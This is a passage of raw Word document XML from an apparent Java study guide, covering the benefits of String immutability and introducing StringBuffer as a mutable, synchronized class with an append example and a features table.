                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Enables memory-efficient reuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00787647" w:rsidRPr="00CE4B95" w14:paraId="7E91EF57" w14:textId="77777777" w:rsidTr="00787647">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2807D7B4" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thread Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FEAD248" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Can be shared between threads without risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00787647" w:rsidRPr="00CE4B95" w14:paraId="2980BD3B" w14:textId="77777777" w:rsidTr="00787647">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F97DEFB" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HashCode Stable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40521F1F" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reliable use in HashMap, HashSet, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00787647" w:rsidRPr="00CE4B95" w14:paraId="1A62F8EE" w14:textId="77777777" w:rsidTr="00787647">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AE85986" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>JVM Optimization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EBF4265" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Better performance due to predictability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61F48CF0" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95"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4A15408D">
          <v:rect id="_x0000_i1096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C30025" w14:textId="557071A7" w:rsidR="00DB1645" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB1645">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc196307499"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is StringBuffer?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="15BD83B4" w14:textId="14C02BC6" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B20079">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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StringBuffer in Java?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227246A4" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">StringBuffer is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class used to create and manipulate </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>strings of characters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150CC88A" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike String, which is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immutable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, StringBuffer objects </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can be changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without creating new objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26760A23" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>methods are synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> so multiple threads can use it safely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196F9671" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B27777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="2BFF806F">
          <v:rect id="_x0000_i1097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EB2997" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B27777">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Declaration &amp; Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253168E9" w14:textId="77777777" w:rsidR="00257220" w:rsidRPr="00CE4B95" w:rsidRDefault="00257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517298"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sb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Buffer</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ello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73927361" w14:textId="77777777" w:rsidR="00257220" w:rsidRPr="00CE4B95" w:rsidRDefault="00257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517298"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s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ppen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 World"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FBD4F0" w14:textId="39D743D6" w:rsidR="00257220" w:rsidRPr="00CE4B95" w:rsidRDefault="00257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517298"/>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 Hello World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C28B81F" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>append() modifies the original object itself, no new object is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612C48A3" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B27777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="03EEFBA5">
          <v:rect id="_x0000_i1098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEB8B13" w14:textId="3512F088" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B27777">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Key Features of StringBuff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07"/>
        <w:gridCol w:w="4493"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w14:paraId="2D9082B6" w14:textId="77777777" w:rsidTr="00C12F79">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39434D64" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00257220">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65FCC7F9" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00257220">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w14:paraId="21A2FA62" w14:textId="77777777" w:rsidTr="00C12F79">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BF33F22" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B27777">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Mutable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DC9CBF9" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B27777">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Can modify content without creating new objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w14:paraId="0E3A9852" w14:textId="77777777" w:rsidTr="00C12F79">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="046C3CCD" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B27777">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Thread-safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4765249E" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B27777">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Methods are synchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w14:paraId="3540B409" w14:textId="77777777" w:rsidTr="00C12F79">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78F229DF" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B27777">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Dynamic length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D3D5707" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B27777">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Grows as needed (like a resizable array)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w14:paraId="2514857A" w14:textId="77777777" w:rsidTr="00C12F79">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E4786ED" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B27777">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Slower than StringBuilder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="690FFAC7" w14:textId="77777777" w:rsidR="00C12F79" w:rsidRPr="00CE4B95" w:rsidRDefault="00C12F79" w:rsidP="00B27777">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
